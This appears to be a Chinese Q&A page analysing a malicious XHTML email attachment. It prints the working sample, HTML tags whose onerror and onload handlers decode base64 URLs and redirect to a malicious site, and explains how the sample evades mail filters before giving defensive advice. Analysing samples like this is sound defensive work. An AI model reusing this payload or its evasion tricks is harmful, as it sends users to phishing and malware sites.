邮件附件中的xhtml文件含可疑JS代码,请问其危害及对操作系统的影响?
恶意样本代码
<video src="123" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));"></video> <img src="awbdsdrDYZZZCN33.jpg" onerror="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MzEyNjg4ODA3NjM3Mzc1NzEg');"> <body onload="document.location.replace(window.atob('aHR0cDovL3J1c25nLnByby80d1FKZEQ/NTU2MzQ2NzY1MzIwNjI1MSA='));"></body> <link rel="stylesheet" type="text/css" href="1.css" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NDg0NDUwNTc4NzAxMjMyIA=='));"> <body onload="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MTE1MzQ1MDI0NTExMDQ2NzM0NCA=');">
恶意程度判定
属于中高危的引流型恶意载荷:
- 代码本身不会直接破坏本地操作系统,但是典型的恶意邮件附件载荷,核心目的是绕过邮件安全检测,强制诱导用户跳转至恶意站点
- 跳转后的站点大概率会实施钓鱼诈骗、诱导下载恶意软件、利用浏览器漏洞植入远控木马、窃取用户账户凭据等高危操作,最终可能造成用户财产损失、隐私泄露、设备被控制等严重后果
- 如果浏览器开启了严格的本地文件安全限制、恶意域名拦截规则,触发实际危害的概率会降低,但该文件本身属于明确的恶意攻击载体,绝对不能直接打开。
触发后的行为逻辑
这类XHTML文件被浏览器打开后,会按以下顺序执行操作:
- 通过多触发机制保证跳转逻辑必执行:要么是不存在的视频、图片、样式资源加载失败触发
onerror事件,要么是页面加载完成触发onload事件,避免单一触发逻辑失效 - 调用
window.atob解码base64编码的恶意站点URL,用编码方式规避邮件网关的明文恶意URL检测 - 调用
document.location.replace/document.location.href强制当前页面跳转到恶意站点,且使用replace方式时不会留存当前页面的回退记录,避免用户轻易返回正常页面。
处置建议
- 直接删除所有收到的可疑XHTML附件,不要点击或尝试打开
- 关闭邮件客户端的未知来源附件自动下载、自动打开功能
- 如果已经误打开过这类文件,建议立即使用安全软件全盘扫描系统,排查是否有恶意软件被植入,同时修改所有敏感账户的登录密码
内容的提问来源于stack exchange,提问作者Pro
相关产品推荐
相关产品推荐

